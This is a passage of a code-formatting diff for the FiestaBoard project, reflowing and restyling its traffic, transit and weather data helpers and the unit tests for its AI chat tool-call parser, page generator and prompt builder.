-                            "latLng": {
-                                "latitude": lat,
-                                "longitude": lng
-                            }
-                        }
-                    }
+                    return {"location": {"latLng": {"latitude": lat, "longitude": lng}}}
                 except ValueError:
                     logger.debug("Could not parse lat/lng from location string: %s", location, exc_info=True)
 
         # Default to address
-        return {
-            "address": location
-        }
+        return {"address": location}
 
 
 def get_traffic_source() -> TrafficSource | None:
     """Get configured traffic source instance."""
-    api_key = Config.GOOGLE_ROUTES_API_KEY if hasattr(Config, 'GOOGLE_ROUTES_API_KEY') else ""
+    api_key = Config.GOOGLE_ROUTES_API_KEY if hasattr(Config, "GOOGLE_ROUTES_API_KEY") else ""
 
     if not api_key:
         logger.warning("Google Routes API key not configured")
         return None
 
     # Support both new (TRAFFIC_ROUTES list) and old (TRAFFIC_ORIGIN/DESTINATION) config
-    routes = getattr(Config, 'TRAFFIC_ROUTES', None)
+    routes = getattr(Config, "TRAFFIC_ROUTES", None)
 
     if not routes:
         # Fall back to single route (backward compatibility)
-        origin = Config.TRAFFIC_ORIGIN if hasattr(Config, 'TRAFFIC_ORIGIN') else ""
-        destination = Config.TRAFFIC_DESTINATION if hasattr(Config, 'TRAFFIC_DESTINATION') else ""
-        destination_name = Config.TRAFFIC_DESTINATION_NAME if hasattr(Config, 'TRAFFIC_DESTINATION_NAME') else "DOWNTOWN"
+        origin = Config.TRAFFIC_ORIGIN if hasattr(Config, "TRAFFIC_ORIGIN") else ""
+        destination = Config.TRAFFIC_DESTINATION if hasattr(Config, "TRAFFIC_DESTINATION") else ""
+        destination_name = (
+            Config.TRAFFIC_DESTINATION_NAME if hasattr(Config, "TRAFFIC_DESTINATION_NAME") else "DOWNTOWN"
+        )
 
         if origin and destination:
-            routes = [{
-                "origin": origin,
-                "destination": destination,
-                "destination_name": destination_name
-            }]
+            routes = [{"origin": origin, "destination": destination, "destination_name": destination_name}]
         else:
             # No routes configured yet, but return source anyway so variables show in UI
             routes = []
 
     # Return source even with empty routes so template variables are available
-    return TrafficSource(
-        api_key=api_key,
-        routes=routes
-    )
+    return TrafficSource(api_key=api_key, routes=routes)

--- a/src/utils/transit_cache.py
+++ b/src/utils/transit_cache.py
@@ -142,11 +142,7 @@ class TransitCache:
         start_time = time.time()
 
         try:
-            params = {
-                "api_key": self._api_key,
-                "agency": self.REGIONAL_AGENCY,
-                "format": "json"
-            }
+            params = {"api_key": self._api_key, "agency": self.REGIONAL_AGENCY, "format": "json"}
 
             logger.debug(f"Fetching regional transit data from 511.org (agency={self.REGIONAL_AGENCY})")
             response = requests.get(self.API_BASE_URL, params=params, timeout=15)
@@ -154,7 +150,7 @@ class TransitCache:
 
             # Handle BOM if present
             content = response.text
-            if content.startswith('\ufeff'):
+            if content.startswith("\ufeff"):
                 content = content[1:]
 
             data = json.loads(content)
@@ -177,8 +173,10 @@ class TransitCache:
                 self._error_count += 1
 
             if e.response.status_code == 429:
-                logger.error(f"Rate limited by 511.org API! This shouldn't happen with regional caching. "
-                           f"Refresh interval may be too short ({self._refresh_interval}s)")
+                logger.error(
+                    f"Rate limited by 511.org API! This shouldn't happen with regional caching. "
+                    f"Refresh interval may be too short ({self._refresh_interval}s)"
+                )
             else:
                 logger.error(f"HTTP error fetching regional transit data: {e}")
 
@@ -281,7 +279,7 @@ class TransitCache:
             self._cache_hits += 1
 
             # Check cache age and warn if stale
-            age = time.time() - self._last_success if self._last_success > 0 else float('inf')
+            age = time.time() - self._last_success if self._last_success > 0 else float("inf")
             if age > self.STALE_WARNING_THRESHOLD:
                 logger.warning(f"TransitCache is stale (age: {age:.0f}s). Data may be outdated.")
 
@@ -359,4 +357,3 @@ def get_transit_cache() -> TransitCache:
     if _cache_instance is None:
         _cache_instance = TransitCache()
     return _cache_instance
-

--- a/src/utils/weather.py
+++ b/src/utils/weather.py
@@ -4,7 +4,7 @@ import logging
 
 import requests
 
-from ..config import Config
+from src.config import Config
 
 logger = logging.getLogger(__name__)
 
@@ -66,8 +66,7 @@ class WeatherSource:
         for loc_config in self.locations:
             try:
                 data = self._fetch_single_location(
-                    location=loc_config.get("location", ""),
-                    location_name=loc_config.get("name", "LOCATION")
+                    location=loc_config.get("location", ""), location_name=loc_config.get("name", "LOCATION")
                 )
                 if data:
                     results.append(data)
@@ -89,20 +88,15 @@ class WeatherSource:
         """
         if self.provider == "weatherapi":
             return self._fetch_weatherapi_for_location(location, location_name)
-        elif self.provider == "openweathermap":
+        if self.provider == "openweathermap":
             return self._fetch_openweathermap_for_location(location, location_name)
-        else:
-            logger.error(f"Unknown weather provider: {self.provider}")
-            return None
+        logger.error(f"Unknown weather provider: {self.provider}")
+        return None
 
     def _fetch_weatherapi_for_location(self, location: str, location_name: str) -> dict[str, any] | None:
         """Fetch weather from WeatherAPI.com for a specific location."""
         url = "http://api.weatherapi.com/v1/current.json"
-        params = {
-            "key": self.api_key,
-            "q": location,
-            "aqi": "no"
-        }
+        params = {"key": self.api_key, "q": location, "aqi": "no"}
 
         try:
             response = requests.get(url, params=params, timeout=10)
@@ -117,7 +111,7 @@ class WeatherSource:
                 "wind_mph": data["current"]["wind_mph"],
                 "wind_speed": data["current"]["wind_mph"],  # Alias for template compatibility
                 "location": data["location"]["name"],
-                "location_name": location_name  # Add display name
+                "location_name": location_name,  # Add display name
             }
 
         except requests.exceptions.RequestException as e:
@@ -130,11 +124,7 @@ class WeatherSource:
     def _fetch_openweathermap_for_location(self, location: str, location_name: str) -> dict[str, any] | None:
         """Fetch weather from OpenWeatherMap for a specific location."""
         url = "https://api.openweathermap.org/data/2.5/weather"
-        params = {
-            "q": location,
-            "appid": self.api_key,
-            "units": "imperial"
-        }
+        params = {"q": location, "appid": self.api_key, "units": "imperial"}
 
         try:
             response = requests.get(url, params=params, timeout=10)
@@ -149,7 +139,7 @@ class WeatherSource:
                 "humidity": data["main"]["humidity"],
                 "wind_mph": data["wind"]["speed"],
                 "wind_speed": data["wind"]["speed"],  # Alias for template compatibility
-                "location_name": location_name  # Add display name
+                "location_name": location_name,  # Add display name
             }
 
         except requests.exceptions.RequestException as e:
@@ -167,22 +157,14 @@ def get_weather_source() -> WeatherSource | None:
         return None
 
     # Support both new (WEATHER_LOCATIONS list) and old (WEATHER_LOCATION) config
-    locations = getattr(Config, 'WEATHER_LOCATIONS', None)
+    locations = getattr(Config, "WEATHER_LOCATIONS", None)
 
     if not locations:
         # Fall back to single location (backward compatibility)
         location = Config.WEATHER_LOCATION
         if location:
-            locations = [{
-                "location": location,
-                "name": "HOME"
-            }]
+            locations = [{"location": location, "name": "HOME"}]
         else:
             locations = []
 
-    return WeatherSource(
-        provider=Config.WEATHER_PROVIDER,
-        api_key=Config.WEATHER_API_KEY,
-        locations=locations
-    )
-
+    return WeatherSource(provider=Config.WEATHER_PROVIDER, api_key=Config.WEATHER_API_KEY, locations=locations)

--- a/tests/__init__.py
+++ b/tests/__init__.py
@@ -2,41 +2,30 @@
 
 """Test helpers package for FiestaBoard."""
 
-from .conftest import (
-    mock_board_client,
-    mock_api_client,
-    sample_page,
-    sample_schedule,
-    sample_plugin
-)
-from .factories import (
-    create_test_page,
-    create_test_schedule,
-    create_test_plugin,
-    create_test_board_state
-)
+from .conftest import mock_api_client, mock_board_client, sample_page, sample_plugin, sample_schedule
+from .factories import create_test_board_state, create_test_page, create_test_plugin, create_test_schedule
 from .helpers import (
-    validate_board_layout,
     validate_api_response_shape,
+    validate_board_layout,
     validate_plugin_output_format,
-    validate_template_variables
+    validate_template_variables,
 )
 
 __all__ = [
-    # conftest fixtures
-    "mock_board_client",
-    "mock_api_client",
-    "sample_page",
-    "sample_schedule",
-    "sample_plugin",
+    "create_test_board_state",
     # factories
     "create_test_page",
-    "create_test_schedule",
     "create_test_plugin",
-    "create_test_board_state",
+    "create_test_schedule",
+    "mock_api_client",
+    # conftest fixtures
+    "mock_board_client",
+    "sample_page",
+    "sample_plugin",
+    "sample_schedule",
+    "validate_api_response_shape",
     # helpers
     "validate_board_layout",
-    "validate_api_response_shape",
     "validate_plugin_output_format",
     "validate_template_variables",
 ]

--- a/tests/ai/test_chat.py
+++ b/tests/ai/test_chat.py
@@ -9,7 +9,7 @@ what a real provider would emit.
 from __future__ import annotations
 
 import json
-from typing import Any, Dict, List
+from typing import Any
 
 import httpx
 import pytest
@@ -20,8 +20,7 @@ from src.ai.chat_ops import (
     parse_tool_call,
 )
 
-
-_PROVIDERS_BLOCK_OPENAI: Dict[str, Any] = {
+_PROVIDERS_BLOCK_OPENAI: dict[str, Any] = {
     "enabled": True,
     "providers": [
         {
@@ -38,7 +37,7 @@ _PROVIDERS_BLOCK_OPENAI: Dict[str, Any] = {
 }
 
 
-_PROVIDERS_BLOCK_ANTHROPIC: Dict[str, Any] = {
+_PROVIDERS_BLOCK_ANTHROPIC: dict[str, Any] = {
     "enabled": True,
     "providers": [
         {
@@ -209,20 +208,20 @@ def test_parse_tool_call_update_setting():
 
 def test_parse_tool_call_update_setting_invalid_category():
     with pytest.raises(ToolCallValidationError):
-        parse_tool_call(
-            {"op": "update_setting", "args": {"category": "mqtt", "values": {}}}
-        )
+        parse_tool_call({"op": "update_setting", "args": {"category": "mqtt", "values": {}}})
 
 
 def test_parse_tool_call_create_carousel():
-    call = parse_tool_call({
-        "op": "create_carousel",
-        "args": {
-            "name": "Morning",
-            "page_ids": ["abc", "def"],
-            "interval_seconds": 45,
-        },
-    })
+    call = parse_tool_call(
+        {
+            "op": "create_carousel",
+            "args": {
+                "name": "Morning",
+                "page_ids": ["abc", "def"],
+                "interval_seconds": 45,
+            },
+        }
+    )
     assert call.op == "create_carousel"
     assert call.args.name == "Morning"
     assert call.args.page_ids == ["abc", "def"]
@@ -230,13 +229,15 @@ def test_parse_tool_call_create_carousel():
 
 
 def test_parse_tool_call_update_carousel():
-    call = parse_tool_call({
-        "op": "update_carousel",
-        "args": {
-            "carousel_id": "carousel:abc",
-            "page_ids": ["x", "y"],
-        },
-    })
+    call = parse_tool_call(
+        {
+            "op": "update_carousel",
+            "args": {
+                "carousel_id": "carousel:abc",
+                "page_ids": ["x", "y"],
+            },
+        }
+    )
     assert call.op == "update_carousel"
     assert call.args.carousel_id == "carousel:abc"
     assert call.args.page_ids == ["x", "y"]
@@ -244,16 +245,18 @@ def test_parse_tool_call_update_carousel():
 
 
 def test_parse_tool_call_create_schedule():
-    call = parse_tool_call({
-        "op": "create_schedule",
-        "args": {
-            "page_id": "abc123",
-            "start_time": "07:00",
-            "end_time": "09:00",
-            "day_pattern": "weekdays",
-            "enabled": True,
-        },
-    })
+    call = parse_tool_call(
+        {
+            "op": "create_schedule",
+            "args": {
+                "page_id": "abc123",
+                "start_time": "07:00",
+                "end_time": "09:00",
+                "day_pattern": "weekdays",
+                "enabled": True,
+            },
+        }
+    )
     assert call.op == "create_schedule"
     assert call.args.page_id == "abc123"
     assert call.args.start_time == "07:00"
@@ -262,26 +265,30 @@ def test_parse_tool_call_create_schedule():
 
 
 def test_parse_tool_call_create_schedule_open_ended():
-    call = parse_tool_call({
-        "op": "create_schedule",
-        "args": {
-            "page_id": "abc123",
-            "start_time": "08:00",
-            "day_pattern": "all",
-            "enabled": True,
-        },
-    })
+    call = parse_tool_call(
+        {
+            "op": "create_schedule",
+            "args": {
+                "page_id": "abc123",
+                "start_time": "08:00",
+                "day_pattern": "all",
+                "enabled": True,
+            },
+        }
+    )
     assert call.args.end_time is None
 
 
 def test_parse_tool_call_update_schedule():
-    call = parse_tool_call({
-        "op": "update_schedule",
-        "args": {
-            "schedule_id": "sch-abc",
-            "enabled": False,
-        },
-    })
+    call = parse_tool_call(
+        {
+            "op": "update_schedule",
+            "args": {
+                "schedule_id": "sch-abc",
+                "enabled": False,
+            },
+        }
+    )
     assert call.op == "update_schedule"
     assert call.args.schedule_id == "sch-abc"
     assert call.args.enabled is False
@@ -289,54 +296,66 @@ def test_parse_tool_call_update_schedule():
 
 
 def test_parse_tool_call_delete_schedule():
-    call = parse_tool_call({
-        "op": "delete_schedule",
-        "args": {"schedule_id": "sch-xyz"},
-    })
+    call = parse_tool_call(
+        {
+            "op": "delete_schedule",
+            "args": {"schedule_id": "sch-xyz"},
+        }
+    )
     assert call.op == "delete_schedule"
     assert call.args.schedule_id == "sch-xyz"
 
 
 def test_parse_tool_call_update_plugin():
-    call = parse_tool_call({
-        "op": "update_plugin",
-        "args": {"plugin_id": "openweather"},
-    })
+    call = parse_tool_call(
+        {
+            "op": "update_plugin",
+            "args": {"plugin_id": "openweather"},
+        }
+    )
     assert call.op == "update_plugin"
     assert call.args.plugin_id == "openweather"
 
 
 def test_parse_tool_call_trigger_system_update():
-    call = parse_tool_call({
-        "op": "trigger_system_update",
-        "args": {},
-    })
+    call = parse_tool_call(
+        {
+            "op": "trigger_system_update",
+            "args": {},
+        }
+    )
     assert call.op == "trigger_system_update"
 
 
 def test_parse_tool_call_enable_plugin():
-    call = parse_tool_call({
-        "op": "enable_plugin",
-        "args": {"plugin_id": "openweather"},
-    })
+    call = parse_tool_call(
+        {
+            "op": "enable_plugin",
+            "args": {"plugin_id": "openweather"},
+        }
+    )
     assert call.op == "enable_plugin"
     assert call.args.plugin_id == "openweather"
 
 
 def test_parse_tool_call_disable_plugin():
-    call = parse_tool_call({
-        "op": "disable_plugin",
-        "args": {"plugin_id": "stocks"},
-    })
+    call = parse_tool_call(
+        {
+            "op": "disable_plugin",
+            "args": {"plugin_id": "stocks"},
+        }
+    )
     assert call.op == "disable_plugin"
     assert call.args.plugin_id == "stocks"
 
 
 def test_parse_tool_call_uninstall_plugin():
-    call = parse_tool_call({
-        "op": "uninstall_plugin",
-        "args": {"plugin_id": "old_plugin"},
-    })
+    call = parse_tool_call(
+        {
+            "op": "uninstall_plugin",
+            "args": {"plugin_id": "old_plugin"},
+        }
+    )
     assert call.op == "uninstall_plugin"
     assert call.args.plugin_id == "old_plugin"
 
@@ -362,11 +381,7 @@ def test_parse_tool_call_bad_arg_types():
         parse_tool_call(
             {
                 "op": "apply_patch",
-                "args": {
-                    "changes": [
-                        {"type": "replace_line", "index": -1, "text": "X"}
-                    ]
-                },
+                "args": {"changes": [{"type": "replace_line", "index": -1, "text": "X"}]},
             }
         )
 
@@ -376,8 +391,8 @@ def test_parse_tool_call_bad_arg_types():
 # ---------------------------------------------------------------------------
 
 
-def _events(parser: _FenceParser, *chunks: str) -> List[Dict[str, Any]]:
-    out: List[Dict[str, Any]] = []
+def _events(parser: _FenceParser, *chunks: str) -> list[dict[str, Any]]:
+    out: list[dict[str, Any]] = []
     for c in chunks:
         out.extend(parser.feed(c))
     out.extend(parser.flush())
@@ -397,18 +412,12 @@ def test_fence_parser_emits_tool_call():
     body = json.dumps(
         {
             "op": "apply_patch",
-            "args": {
-                "changes": [
-                    {"type": "replace_line", "index": 0, "text": "HI"}
-                ]
-            },
+            "args": {"changes": [{"type": "replace_line", "index": 0, "text": "HI"}]},
         }
     )
     chunk = f"Here you go:\n```fiestaboard\n{body}\n```\nDone!"
     events = _events(p, chunk)
-    text = "".join(
-        e["data"]["delta"] for e in events if e["event"] == "text"
-    )
+    text = "".join(e["data"]["delta"] for e in events if e["event"] == "text")
     tools = [e for e in events if e["event"] == "tool_call"]
     assert "Here you go" in text
     assert "Done!" in text
@@ -422,15 +431,11 @@ def test_fence_parser_handles_chunked_fence_open():
     p = _FenceParser()
     body = '{"op":"suggest_variables","args":{"suggestions":[]}}'
     # Split right in the middle of the marker.
-    events = _events(
-        p, "Look:\n``", "`fiest", "aboard\n", body, "\n```\nbye"
-    )
+    events = _events(p, "Look:\n``", "`fiest", "aboard\n", body, "\n```\nbye")
     tools = [e for e in events if e["event"] == "tool_call"]
     assert len(tools) == 1
     assert tools[0]["data"]["op"] == "suggest_variables"
-    text = "".join(
-        e["data"]["delta"] for e in events if e["event"] == "text"
-    )
+    text = "".join(e["data"]["delta"] for e in events if e["event"] == "text")
     assert text.startswith("Look:\n")
     assert text.endswith("bye")
 
@@ -454,11 +459,7 @@ def test_fence_parser_invalid_json_emits_warning():
 
 def test_fence_parser_invalid_op_emits_warning():
     p = _FenceParser()
-    chunk = (
-        "```fiestaboard\n"
-        + json.dumps({"op": "self_destruct", "args": {}})
-        + "\n```"
-    )
+    chunk = "```fiestaboard\n" + json.dumps({"op": "self_destruct", "args": {}}) + "\n```"
     events = _events(p, chunk)
     warnings = [e for e in events if e["event"] == "warning"]
     assert len(warnings) == 1
@@ -539,9 +540,9 @@ def test_fence_parser_repairs_apply_patch_filled_color():
 # ---------------------------------------------------------------------------
 
 
-def _openai_sse(text_chunks: List[str], usage: Dict[str, int] | None = None) -> bytes:
+def _openai_sse(text_chunks: list[str], usage: dict[str, int] | None = None) -> bytes:
     """Build a minimal OpenAI-compatible SSE response body."""
-    lines: List[str] = []
+    lines: list[str] = []
     for text in text_chunks:
         chunk = {"choices": [{"delta": {"content": text}}]}
         lines.append(f"data: {json.dumps(chunk)}\n\n")
@@ -551,13 +552,11 @@ def _openai_sse(text_chunks: List[str], usage: Dict[str, int] | None = None) -> 
     return "".join(lines).encode("utf-8")
 
 
-def _anthropic_sse(text_chunks: List[str]) -> bytes:
+def _anthropic_sse(text_chunks: list[str]) -> bytes:
     """Build a minimal Anthropic-shape SSE response body."""
-    lines: List[str] = [
+    lines: list[str] = [
         "event: message_start\n",
-        "data: "
-        + json.dumps({"type": "message_start", "message": {"usage": {"input_tokens": 7}}})
-        + "\n\n",
+        "data: " + json.dumps({"type": "message_start", "message": {"usage": {"input_tokens": 7}}}) + "\n\n",
     ]
     for text in text_chunks:
         ev = {
@@ -567,11 +566,7 @@ def _anthropic_sse(text_chunks: List[str]) -> bytes:
         lines.append("event: content_block_delta\n")
         lines.append(f"data: {json.dumps(ev)}\n\n")
     lines.append("event: message_delta\n")
-    lines.append(
-        "data: "
-        + json.dumps({"type": "message_delta", "usage": {"output_tokens": 3}})
-        + "\n\n"
-    )
+    lines.append("data: " + json.dumps({"type": "message_delta", "usage": {"output_tokens": 3}}) + "\n\n")
     lines.append("event: message_stop\n")
     lines.append('data: {"type": "message_stop"}\n\n')
     return "".join(lines).encode("utf-8")
@@ -604,19 +599,24 @@ def _stream_response(body: bytes) -> httpx.Response:
 
 @pytest.mark.asyncio
 async def test_stream_chat_emits_text_and_tool_call():
-    body = "Sure!\n```fiestaboard\n" + json.dumps(
-        {
-            "op": "apply_patch",
-            "args": {
-                "changes": [
-                    {"type": "replace_line", "index": 0, "text": "HELLO"}
-                ]
-            },
-        }
-    ) + "\n```\nAll set."
-    sse = _openai_sse([body[:5], body[5:30], body[30:]], usage={
-        "prompt_tokens": 10, "completion_tokens": 4, "total_tokens": 14,
-    })
+    body = (
+        "Sure!\n```fiestaboard\n"
+        + json.dumps(
+            {
+                "op": "apply_patch",
+                "args": {"changes": [{"type": "replace_line", "index": 0, "text": "HELLO"}]},
+            }
+        )
+        + "\n```\nAll set."
+    )
+    sse = _openai_sse(
+        [body[:5], body[5:30], body[30:]],
+        usage={
+            "prompt_tokens": 10,
+            "completion_tokens": 4,
+            "total_tokens": 14,
+        },
+    )
 
     def handler(request: httpx.Request) -> httpx.Response:
         assert request.url.path.endswith("/chat/completions")
@@ -628,7 +628,7 @@ async def test_stream_chat_emits_text_and_tool_call():
     transport = httpx.MockTransport(handler)
     client = httpx.AsyncClient(transport=transport)
     try:
-        events: List[Dict[str, Any]] = []
+        events: list[dict[str, Any]] = []
         async for evt in stream_chat(
             messages=[{"role": "user", "content": "make line 1 say hello"}],
             device_type="flagship",
@@ -654,9 +654,7 @@ async def test_stream_chat_emits_text_and_tool_call():
     assert len(tool_calls) == 1
     assert tool_calls[0]["data"]["op"] == "apply_patch"
 
-    text = "".join(
-        e["data"]["delta"] for e in events if e["event"] == "text"
-    )
+    text = "".join(e["data"]["delta"] for e in events if e["event"] == "text")
     assert "Sure!" in text
     assert "All set" in text
 
@@ -688,11 +686,9 @@ async def test_stream_chat_anthropic_protocol():
     finally:
         await client.aclose()
 
-    text = "".join(
-        e["data"]["delta"] for e in events if e["event"] == "text"
-    )
+    text = "".join(e["data"]["delta"] for e in events if e["event"] == "text")
     assert text == body
-    done = [e for e in events if e["event"] == "done"][0]
+    done = next(e for e in events if e["event"] == "done")
     assert done["data"]["usage"]["prompt_tokens"] == 7
     assert done["data"]["usage"]["completion_tokens"] == 3
     assert done["data"]["usage"]["total_tokens"] == 10
@@ -728,18 +724,14 @@ async def test_stream_chat_invalid_tool_emits_warning_but_continues():
     assert any("Unknown tool op" in w["data"]["message"] for w in warnings)
     # Stream still finished cleanly.
     assert events[-1]["event"] == "done"
-    text = "".join(
-        e["data"]["delta"] for e in events if e["event"] == "text"
-    )
+    text = "".join(e["data"]["delta"] for e in events if e["event"] == "text")
     assert "Never mind" in text
 
 
 @pytest.mark.asyncio
 async def test_stream_chat_provider_error_emits_error_event():
     def handler(request: httpx.Request) -> httpx.Response:
-        return httpx.Response(
-            401, json={"error": {"message": "Bad API key"}}
-        )
+        return httpx.Response(401, json={"error": {"message": "Bad API key"}})
 
     transport = httpx.MockTransport(handler)
     client = httpx.AsyncClient(transport=transport)
@@ -774,9 +766,7 @@ async def test_stream_chat_rejects_empty_messages():
             variables={},
         )
     ]
-    assert events == [
-        {"event": "error", "data": {"message": "No messages provided."}}
-    ]
+    assert events == [{"event": "error", "data": {"message": "No messages provided."}}]
 
 
 @pytest.mark.asyncio
@@ -793,18 +783,14 @@ async def test_stream_chat_rejects_when_no_user_last():
             variables={},
         )
     ]
-    assert any(
-        e["event"] == "error"
-        and "must end with a user message" in e["data"]["message"]
-        for e in events
-    )
+    assert any(e["event"] == "error" and "must end with a user message" in e["data"]["message"] for e in events)
 
 
 @pytest.mark.asyncio
 async def test_stream_chat_includes_history_in_request():
     """History messages should be forwarded to the provider verbatim."""
     sse = _openai_sse(["ok"])
-    captured: Dict[str, Any] = {}
+    captured: dict[str, Any] = {}
 
     def handler(request: httpx.Request) -> httpx.Response:
         captured["body"] = json.loads(request.content)
@@ -851,6 +837,7 @@ def reset_throttle(monkeypatch):
 
 def test_chat_endpoint_validates_body(reset_throttle):
     from fastapi.testclient import TestClient
+
     from src.api_server import app
 
     client = TestClient(app)
@@ -860,6 +847,7 @@ def test_chat_endpoint_validates_body(reset_throttle):
 
 def test_chat_endpoint_rejects_invalid_device_type(reset_throttle):
     from fastapi.testclient import TestClient
+
     from src.api_server import app
 
     client = TestClient(app)

--- a/tests/ai/test_chat.py
+++ b/tests/ai/test_chat.py
@@ -366,7 +366,7 @@ def test_parse_tool_call_unknown_op():
 
 
 def test_parse_tool_call_missing_op():
-    with pytest.raises(ToolCallValidationError, match="missing.*op"):
+    with pytest.raises(ToolCallValidationError, match=r"missing.*op"):
         parse_tool_call({"args": {}})
 
 

--- a/tests/ai/test_generator.py
+++ b/tests/ai/test_generator.py
@@ -7,11 +7,10 @@ and hallucinated-variable paths without hitting any real LLM.
 from __future__ import annotations
 
 import json
-from typing import Any, Dict, Optional
-
-import pytest
+from typing import Any
 
 import httpx
+import pytest
 
 from src.ai.generator import (
     AIGenerationError,
@@ -22,9 +21,10 @@ from src.ai.generator import (
     _resolve_provider,
     _validate_and_repair,
     generate_page,
+)
+from src.ai.generator import (
     test_provider as ai_test_provider,
 )
-
 
 # ---------------------------------------------------------------------------
 # Provider / model resolution
@@ -104,12 +104,12 @@ def test_extract_json_object_strict():
 
 
 def test_extract_json_object_handles_markdown_fence():
-    text = "```json\n{\"a\": 2}\n```"
+    text = '```json\n{"a": 2}\n```'
     assert _extract_json_object(text) == {"a": 2}
 
 
 def test_extract_json_object_handles_preamble():
-    text = "Here you go!\n\n{\"name\": \"X\", \"template\": []}\nThanks"
+    text = 'Here you go!\n\n{"name": "X", "template": []}\nThanks'
     assert _extract_json_object(text) == {"name": "X", "template": []}
 
 
@@ -224,9 +224,7 @@ def test_validate_and_repair_flags_unknown_variables():
         "device_type": "flagship",
         "template": ["{{ghost.field}}", "", "", "", "", ""],
     }
-    known: Dict[str, Dict[str, Dict[str, Any]]] = {
-        "weather": {"temperature": {"description": "x"}}
-    }
+    known: dict[str, dict[str, dict[str, Any]]] = {"weather": {"temperature": {"description": "x"}}}
     _page, warnings = _validate_and_repair(raw, "flagship", known)
     assert any("ghost.field" in w for w in warnings)
 
@@ -361,7 +359,7 @@ class _MockAsyncClient:
         self._responder = responder
         self.calls = []
 
-    async def post(self, url, headers=None, json=None):  # noqa: A002
+    async def post(self, url, headers=None, json=None):
         self.calls.append({"url": url, "headers": headers, "json": json})
         return self._responder(url, headers, json)
 
@@ -369,14 +367,13 @@ class _MockAsyncClient:
         pass
 
 
-def _make_chat_response(content: str, usage: Optional[Dict[str, int]] = None):
+def _make_chat_response(content: str, usage: dict[str, int] | None = None):
     return _MockResponse(
         200,
         {
-            "choices": [
-                {"message": {"role": "assistant", "content": content}}
-            ],
-            "usage": usage or {
+            "choices": [{"message": {"role": "assistant", "content": content}}],
+            "usage": usage
+            or {
                 "prompt_tokens": 10,
                 "completion_tokens": 5,
                 "total_tokens": 15,
@@ -408,9 +405,7 @@ async def test_generate_page_happy_path():
         "type": "template",
         "device_type": "flagship",
         "template": ["", "{{date_time.time_12h}}", "", "", "", ""],
-        "line_metadata": [
-            {"alignment": "center", "wrap": False} for _ in range(6)
-        ],
+        "line_metadata": [{"alignment": "center", "wrap": False} for _ in range(6)],
         "duration_seconds": 60,
     }
 
@@ -443,9 +438,7 @@ async def test_generate_page_repairs_oversized_lines():
         "type": "template",
         "device_type": "flagship",
         "template": ["X" * 50, "", "", "", "", ""],
-        "line_metadata": [
-            {"alignment": "left", "wrap": False} for _ in range(6)
-        ],
+        "line_metadata": [{"alignment": "left", "wrap": False} for _ in range(6)],
     }
 
     def responder(url, headers, body):
@@ -538,9 +531,7 @@ async def test_test_provider_returns_ok_on_success():
         return _make_chat_response("ok")
 
     client = _MockAsyncClient(responder)
-    result = await ai_test_provider(
-        _PROVIDERS_BLOCK["providers"][0], client=client
-    )
+    result = await ai_test_provider(_PROVIDERS_BLOCK["providers"][0], client=client)
     assert result["ok"] is True
     assert result["model_used"] == "test-model"
 
@@ -555,9 +546,7 @@ async def test_test_provider_returns_failure_on_error():
         )
 
     client = _MockAsyncClient(responder)
-    result = await ai_test_provider(
-        _PROVIDERS_BLOCK["providers"][0], client=client
-    )
+    result = await ai_test_provider(_PROVIDERS_BLOCK["providers"][0], client=client)
     assert result["ok"] is False
     assert "boom" in result["message"]
 
@@ -603,9 +592,7 @@ async def test_generate_page_refusal_uses_fallback_message_when_reason_missing()
 @pytest.mark.asyncio
 async def test_generate_page_raises_on_network_error():
     """A transport-level failure (connection refused, timeout) raises AIGenerationError."""
-    transport = httpx.MockTransport(
-        lambda req: (_ for _ in ()).throw(httpx.ConnectError("connection refused"))
-    )
+    transport = httpx.MockTransport(lambda req: (_ for _ in ()).throw(httpx.ConnectError("connection refused")))
     async with httpx.AsyncClient(transport=transport) as client:
         with pytest.raises(AIGenerationError, match="Could not reach AI provider"):
             await generate_page(

--- a/tests/ai/test_prompt_builder.py
+++ b/tests/ai/test_prompt_builder.py
@@ -1,6 +1,6 @@
 """Unit tests for src/ai/prompt_builder.py."""
 
-from src.ai.prompt_builder import build_prompt, _summarize_schema
+from src.ai.prompt_builder import _summarize_schema, build_prompt
 
 
 def test_flagship_prompt_includes_dimensions():
@@ -161,9 +161,7 @@ def test_prompt_does_not_teach_fictional_degree_token():
     assert "NO `{degree}`" in ctx.system_prompt
     for ex in ctx.exemplars:
         for line in ex.get("template", []):
-            assert "{degree}" not in line, (
-                f"exemplar {ex.get('name')!r} contains fictional {{degree}}"
-            )
+            assert "{degree}" not in line, f"exemplar {ex.get('name')!r} contains fictional {{degree}}"
 
 
 def test_prompt_pins_device_type_in_output_rules():
@@ -193,15 +191,33 @@ def test_prompt_documents_full_token_set():
     sp = ctx.system_prompt
     # Color tokens — must be shown with DOUBLE braces because the
     # engine's COLOR_PATTERN only matches that form.
-    for tok in ("{{red}}", "{{orange}}", "{{yellow}}", "{{green}}",
-                "{{blue}}", "{{violet}}", "{{purple}}", "{{white}}",
-                "{{black}}"):
+    for tok in (
+        "{{red}}",
+        "{{orange}}",
+        "{{yellow}}",
+        "{{green}}",
+        "{{blue}}",
+        "{{violet}}",
+        "{{purple}}",
+        "{{white}}",
+        "{{black}}",
+    ):
         assert tok in sp, f"missing color token {tok}"
     assert "{{filled}}" not in sp, "standalone {{filled}} removed; use {{filled:X}} instead"
     # Symbol tokens — single-brace, real engine tokens only.
-    for tok in ("{sun}", "{star}", "{cloud}", "{rain}", "{snow}",
-                "{storm}", "{fog}", "{partly}", "{heart}", "{check}",
-                "{x}"):
+    for tok in (
+        "{sun}",
+        "{star}",
+        "{cloud}",
+        "{rain}",
+        "{snow}",
+        "{storm}",
+        "{fog}",
+        "{partly}",
+        "{heart}",
+        "{check}",
+        "{x}",
+    ):
         assert tok in sp, f"missing symbol token {tok}"
 
 
@@ -229,9 +245,13 @@ def test_prompt_scope_message_calls_out_current_instance():
     # The variables block should make it clear to the model that the
     # listed plugins are the ones enabled on THIS instance, not the
     # universe of FiestaBoard plugins.
-    ctx = build_prompt("x", "flagship", variables={
-        "weather": {"temperature": {"description": "F", "example": "72"}},
-    })
+    ctx = build_prompt(
+        "x",
+        "flagship",
+        variables={
+            "weather": {"temperature": {"description": "F", "example": "72"}},
+        },
+    )
     assert "THIS instance" in ctx.system_prompt
     assert "do not invent" in ctx.system_prompt.lower()
 
@@ -317,6 +337,7 @@ def test_prompt_installed_plugins_no_schema_omits_config_line():
 
 
 # --- _summarize_schema unit tests ---
+
 
 def test_summarize_schema_empty_returns_empty():
     assert _summarize_schema({}) == ""

--- a/tests/ai/test_protocols.py
+++ b/tests/ai/test_protocols.py
@@ -7,18 +7,16 @@ branching elsewhere — all wire-format differences are isolated to
